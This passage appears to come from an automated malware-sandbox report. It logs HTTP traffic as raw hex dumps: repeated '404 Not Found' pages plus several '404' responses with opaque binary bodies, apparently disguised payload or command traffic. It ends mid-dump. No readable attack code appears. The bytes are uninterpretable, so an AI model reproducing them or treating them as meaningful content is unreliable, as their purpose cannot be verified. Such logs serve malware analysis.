74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1McjKsnOP64XZW%2FaK815GI%2Bd7iETRdqkCVB5Hc7fmNJFIJBfIUOSjBrdAAjlWHxzdqFCh9wcTXNyOo5wji4vfzA7b0kyOZNiwfilmJoT%2FmJDm76lVaKIILIbtiLQZzbeMQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979caa3c17775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 9e 1a d9 1a d7 ff 17 a2 2e f6 2d 42 17 34 ff 6b 4b 62 85 54 2c 18 36 c1 a8 cb ac d7 75 95 37 79 16 35 ff b7 0d 0a Data Ascii: 38Uys/~(u:R.-B4kKbT,6u7y5
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pq6Btvyo1ee%2BHZETKf8WUAyPyn3f0kfeSa25s7qlehqQY5ud70qgbDxt5f8vSvUS4CTLOAaSAZKXEq129Ummib8XDsf2bQhw0PrT8nq4eG0U3OIKP5lP3H%2BR5%2BFh6hwWLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cc56b28775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rz2LTai8UoAyqlyruCRtQGdY9up19CNKLF5S5NFKHRugOi5WsKByxB8qrkS25bTNNXVFtqpsyq%2B6Ms%2BXZKAOvKyj4BmcoCmjetzdqjsJqeJKWkJ76T%2FdwICajcKGKaAgkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cc69d9a775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 85 14 dd 51 d5 ff 13 b1 67 f2 25 48 16 22 e0 6a 0b 65 88 17 0a 03 6b de a0 81 8f d0 30 d1 76 64 5d 28 e2 0d 0a Data Ascii: 37Uys/~(u:RQg%H"jek0vd](
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7Lie5HcEy528iAEIfjSq7UEkR1uOq33iV1dhBmypT4oeG%2FuFqleVSPjN%2Bwnz1VEfiiKr4aFCqQcXTVfu5Zv7dbQzLTg0HCdEAlEmkPcWAzmT80M1JjrnZ%2Fo4owooz2mNgw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cd1d8930716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U1UwcdvmLUwlRPNHiN5fkoiihnZR1cj%2F7WRWSEGdZd3stWfUmXPyskjQw1nc1FCqVovKunECdL7lRkqLk%2FDniPvc%2FAHs3NHJPI7A7Zh28sZoJpJj%2F8UGRCPl6XJmg8NNJg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cd36a780716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 f3 dd 04 1a ea 42 12 73 46 12 e9 bf 9a 81 35 7c 01 13 96 5d 50 bf d8 75 92 a7 0a fe 30 71 33 bc a3 7c f7 ca 3e 59 57 cb c6 68 c5 b3 3b 73 51 71 64 64 b8 f0 ff 20 3d a7 58 93 e0 52 bb f8 db cc 63 48 c7 29 a0 b0 4d da 16 85 c5 d4 90 13 19 5f bf 6c 13 d9 7b 64 58 c5 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 ec 4d 1a 77 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e c1 f6 ff 78 b3 56 db c4 0d 13 13 0f 68 e1 92 24 18 4f c5 03 01 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ea f1 96 be 21 51 61 f7 ec 3b 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 0b 7a e5 0e f4 eb 7e 71 eb a0 f6 1a e0 30 4b d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 eb 2e b9 5a e0 cc 23 92 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f ab 9d cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 
9d a7 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 23 e9 de 8e 82 11 e8 e4 1f da a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 94 6f 84 1f d4 fc 69 91 9c 65 07 f1 2c d6 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 44 12 8a 8b e1 42 79 d7 9c 24 c2 e0 2b 7d b6 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c 13 3d f5 52 48 14 3e 96 4d d5 e7 17 3f 5c e1 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 Data Ascii: 3830`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*BsF5|]Pu0q3|>YWh;sQqdd =XRcH)M_l{dX3Ob>!ZC:>MwSSP*{~xVh$Oa~i~]DzN,!Qa;|(kJk?a]
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dN2KNRRLRekgNeV4b%2Fz2Ol93bzi0ht6P1F9WvwLx3MpxFevNfnauDQCn%2BXcJyYgAuEXqt%2B9GmAb8ExwUiahlOYCPkualScJb7jQTwfJEhe4RKMW3zctEqwK1rr4XIz5yZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cdabba30716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sw1wBG91n04tfI1nMl23%2F9SZD5BlckR0tZCJhq8kf0DDiVe%2FUx%2BPeveymWMF9BbvWRMEMbkRUmTQwx74w5ZTMofAkc03YjNzBSB4YMZNkqn3WXuzLF24qHKyKOQ3U8ePPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cdc6dd40716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 33 39 33 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 e2 82 15 fc 28 6a ac 53 f6 c7 35 f3 73 07 03 d2 ef f9 fb fa eb b1 87 6a cd 31 3d 33 d1 b2 77 45 7c 1f 57 44 7d 42 f7 3c 50 25 51 fe 08 22 b9 3f 19 66 3d 28 2a 97 6a dd d6 bc db 43 17 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed f5 10 b1 17 26 58 4a 33 4f 62 3e 17 21 2b da a3 06 83 3a 56 3f cb 00 23 ae 42 15 d7 07 53 53 fa cb 0f 9e 1d 09 52 2b e5 9d 83 7b 7e 45 f7 ff 78 8d 55 db d4 0d 13 13 bf 1e e1 92 24 08 4f c5 1b cf e7 a1 c1 7e de f5 69 b9 19 17 7e 5f af 9a 95 18 a9 a0 ed 31 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 55 a0 1a bf 76 34 fd f8 12 37 53 6c 19 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb f0 b3 1a b8 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 9c 01 6b 49 0d 92 90 f7 83 f0 e2 e7 72 3b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 f9 48 15 cc 81 99 bd 34 49 ce ba 68 50 9e fc 9d 
7f 5f 5b 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 b1 8a 64 f1 33 54 73 25 ed 70 17 4b 65 f2 df 8e 82 c1 f9 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 5e 54 ab de 08 0d 75 8f b7 af 57 a3 68 99 85 1f d4 3c 7a 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca 92 b6 3b 35 2d 11 6d 43 58 b9 8b 8b e1 92 68 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a6 b4 47 30 80 e3 1c e1 7f e3 52 48 c4 29 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca e2 cf 25 4e b1 e0 a3 9c 04 98 c3 a7 51 2c fd d4 5f 49 6a 43 9c d3 34 62 18 3e 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d Data Ascii: 4393`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*j(jS5sj1=3wE|WD}B<P%Q"?f=(*jC\SMUbT[U&XJ3Ob>!+:V?#BSSR+{~ExU$O~i~_1zN,%Qa>|(HkJ{/a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tp5mXNxwR9fmWtX%2Fdi2xhdLiXe46SJbmILKqD4at0aDTutWJPqK2MxsMmSeF8K8kIjhGO9GdPUygYHNsCTs45dLqhesSCIbpH4AL3%2FbjHZXY%2BxWWP9Jobi%2FU4dYUgifOSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cf02da80716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=96YZWi58%2Fxd0XPFczlcj7a48R%2F0pQmV73bKEREgezNFj1cKCnQeUHLRDzs5clkOyUj1xsUCGsxZanaSrYtBsUarjjoqE9C%2BexUsMgXPAjc5Gll5X7bGIRVJebaN0ffGxAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cf1afc40716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:59 GMTServer: Apache/2.4.41 (Ubuntu)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 37 35 32 32 0d 0a 53 00 00 00 8f 3b 45 30 46 2c cf 60 b9 6a 5a 56 fd aa f0 00 44 2e f9 96 b4 f0 a5 47 03 af d5 2e f1 b0 70 50 db a4 94 f0 31 a2 da 8c a0 37 bd 47 9a a0 1b 43 cd 66 5d 8b 58 3b b5 cc d7 06 9a e2 13 8c 8d 91 f8 2b a4 1e 31 f3 d8 ca f9 e4 dd 3b f9 1c 88 21 b0 c2 f0 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b 
